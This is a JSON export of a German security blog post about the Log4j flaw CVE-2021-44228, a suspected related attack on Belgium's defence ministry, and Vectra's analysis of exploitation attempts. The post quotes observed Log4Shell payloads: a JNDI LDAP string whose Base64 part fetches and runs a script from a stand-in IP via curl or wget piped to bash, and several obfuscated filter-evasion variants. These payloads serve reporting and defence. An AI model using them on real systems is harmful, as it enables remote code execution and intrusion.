{"id":260765,"date":"2021-12-20T15:26:39","date_gmt":"2021-12-20T14:26:39","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=260765"},"modified":"2024-06-17T14:14:47","modified_gmt":"2024-06-17T12:14:47","slug":"log4j-infos-belgisches-verteidigungsministerium-betroffen","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2021\/12\/20\/log4j-infos-belgisches-verteidigungsministerium-betroffen\/","title":{"rendered":"Log4j-Infos, belgisches Verteidigungsministerium betroffen?"},"content":{"rendered":"

\"Sicherheit[English<\/a>]Die Schwachstelle CVE-2021-44228 in der JAVA-Bibliothek log4j zieht weitere Kreise. Das belgische Verteidigungsministerium hat seine Netzwerke nach einem schweren Cyberangriff wohl abgeschaltet und dies in der Nacht von Sonntag auf Montag eingestanden. Berichte kolportieren, dass es mit der log4j-Schwachstelle CVE-2021-44228 zu tun habe. Derweil l\u00e4uft das Patchen der verwundbaren Bibliothek in den betroffenen Produkten nur z\u00e4h an. Administratoren haben oft das Problem, herauszufinden, ob und welche Software betroffen ist.
\n
\n\"\"Ich hatte ja im Blog-Beitrag 0-day CVE-2021-44228 in Java log4j-Bibliothek tangiert zahlreiche Anbieter<\/a> \u00fcber die Schwachstelle, die zahlreiche Systeme betrifft, berichtet. Und es war bekannt, dass das Bundesfinanzhof zu den Opfern geh\u00f6rt, die ihre Webseite offline nehmen mussten (siehe Log4j-News: New Schwachstelle, Bundesfinanzhof-Webseite down, viele Firmen ungepatcht<\/a>).<\/p>\n

Belgisches Verteidigungsministerium schaltet Netzwerk ab<\/h2>\n

Ich bin \u00fcber nachfolgenden Tweet<\/a> von Catalin Cimpanu auf den Sachverhalt aufmerksam geworden. Das belgisches Verteidigungsministerium hat Teile seines IT-Netzwerks offline geschaltet, weil ein Cyber-Angriff stattgefunden hat. Davon sind auch die E-Mail-Server betroffen.<\/p>\n

\"Belgisches<\/a><\/p>\n

Dieser fl\u00e4mischsprachige Artikel<\/a> enth\u00e4lt einige Hinweise. Seit vergangenem Donnerstag k\u00e4mpft das Verteidigungsministerium Belgiens mit den Folgen eines schweren Cyberangriffs. Ein Teil des Computernetzes kann nach Angaben des Sprechers vorerst nicht genutzt werden. Sprecher Olivier S\u00e9verin sagte dazu:<\/p>\n

Das Verteidigungsministerium hat am Donnerstag einen Angriff auf sein Computernetzwerk mit Internetzugang entdeckt. Schnell wurden Quarant\u00e4nema\u00dfnahmen ergriffen, um die betroffenen Teile zu isolieren. Vorrangig geht es darum, das Verteidigungsnetz einsatzbereit zu halten.<\/p>\n

W\u00e4hrend des gesamten Wochenendes waren unsere Teams im Einsatz, um das Problem unter Kontrolle zu bringen, unseren Betrieb fortzusetzen und unsere Partner zu alarmieren. Die Priorit\u00e4t liegt darin, das Netz betriebsbereit zu halten. Wir werden die Situation weiter beobachten<\/p><\/blockquote>\n

Als Folge der Quarant\u00e4nema\u00dfnahmen ist das Mailsystem zum Beispiel seit au\u00dfer Betrieb. Der Cyberangriff erfolgte, laut dem verlinkten Artikel, nachdem erst letzte Woche eine Sicherheitsl\u00fccke (log4j) in der Software entdeckt worden war. Es ist nicht klar, wer hinter dem Computerangriff auf den Verteidigungsbereich steckt. Das Verteidigungsministerium verweigert aktuell aber jede Auskunft, ob der Angriff \u00fcber die log4j-Schwachstelle mittels einer Log4Shell stattgefunden hat.<\/p>\n

Vectra AI-Analyse zu log4j<\/h2>\n

Der Sicherheitsanbieter Vectra hat aktiv die Versuche von Angreifern beobachtet, diese Schwachstelle in freier Wildbahn auszunutzen. Die nachstehende Grafik aus Vectra Recall<\/a> zeigt eine Flut von HTTP-Anfragen, die Nutzdaten f\u00fcr den Exploit enthalten.<\/p>\n


\nQuelle: Vectra Recall<\/p>\n

Die meisten dieser urspr\u00fcnglichen Versuche kamen aus dem Tor-Netzwerk und versuchten, Hosts dazu zu bringen, die Domain *bingsearchlib[.]com <\/em>zu kontaktieren. Obwohl es einige Spekulationen dar\u00fcber gibt, was diese Domain beinhaltet, wurden von Vectra keine Nutzdaten von dieser Domain abgerufen. Private Analysen deuten darauf hin, dass die Nutzlast mit dem Coin Mining zusammenh\u00e4ngt.<\/p>\n

Vectra hat die verschiedenen Domains beobachtet, die als URL in den Log4shell-Strings verwendet werden (entweder in den User Agent, die URI oder andere Klartextfelder der HTTP-Anfrage gepackt). Die Verwendung des urspr\u00fcnglich identifizierten Exploits hat sich weiterentwickelt, wobei potenzielle Angreifer den ausf\u00fchrbaren Teil des Exploits beispielsweise in eine Base64-Zeichenfolge am Ende der JNDI-URL kodieren:<\/p>\n

${jndi:ldap:\/\/1.2.3.4:12344\/Basic\/Command\/Base64\/KGN1cmwgLXMgMS4yLjMuNDo1ODc0LzEuMi4zLjQ6NDQzfHx3Z2V0IC1xIC1PLSAxLjIuMy40OjU4NzQvMS4yLjMuNDo0NDMpfGJhc2g=<\/pre>\n
Vectra hat IPs mit dieser Kodierung mehrfach in seinen Metadaten beobachtet.<\/p>\n
Eine weitere Entwicklung, die Vectra in freier Wildbahn beobachtet hat, ist eine zweite Ebene der Verschleierung, die von Bedrohungsakteuren eingesetzt wird. Dabei handelt es sich um eine weitere Funktion der JNDI-Engine, die es erm\u00f6glicht, gesendete Zeichenketten in ihr urspr\u00fcngliches Format zu entschl\u00fcsseln und dann die Verbindung zum LDAP-\/Verzeichnisdienst herzustellen. Diese wurden wie folgt beobachtet:<\/p>\n
${jndi:${lower:l}${lower:d}a${lower:p}:\/\/world80\r\n${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}\/\/\r\n${jndi:dns:\/\/<\/pre>\n
W\u00e4hrend Vectra diese Entwicklung bereits vor zehn Tagen feststellte, ist die Nutzung seitdem tats\u00e4chlich zur\u00fcckgegangen. Doch warum ist das so?<\/p>\n
Leider treiben die Verteidiger die Entwicklung von Exploits voran<\/b><\/p>\n
W\u00e4hrend die Verteidiger versuchen, sich gegen neue Exploits zu sch\u00fctzen, versuchen die Angreifer, sich weiterzuentwickeln. Der R\u00fcckgang der zweiten Stufe kann speziell mit einem (inzwischen gel\u00f6schten) Repository auf GitHub in Verbindung gebracht werden.<\/p>\n
\u00c4hnliche Artikel:<\/strong>
\n0-day CVE-2021-44228 in Java log4j-Bibliothek tangiert zahlreiche Anbieter<\/a>
\nGegenmittel f\u00fcr 0-day CVE-2021-44228 in Java log4j-Bibliothek<\/a>
\nlog4j-Schwachstelle CVE-2021-44228: Minecraft dringend patchen<\/a>
\nVMware-Produkte durch log4j-Schwachstelle CVE-2021-44228 bedroht<\/a>
\nlog4j FAQ und Repository<\/a>
\nLog4j-News: New Schwachstelle, Bundesfinanzhof-Webseite down, viele Firmen ungepatcht<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
[English]Die Schwachstelle CVE-2021-44228 in der JAVA-Bibliothek log4j zieht weitere Kreise. Das belgische Verteidigungsministerium hat seine Netzwerke nach einem schweren Cyberangriff wohl abgeschaltet und dies in der Nacht von Sonntag auf Montag eingestanden. Berichte kolportieren, dass es mit der log4j-Schwachstelle CVE-2021-44228 … Weiterlesen →<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[426],"tags":[4328],"class_list":["post-260765","post","type-post","status-publish","format-standard","hentry","category-sicherheit","tag-sicherheit"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/260765","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=260765"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/260765\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=260765"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=260765"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=260765"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}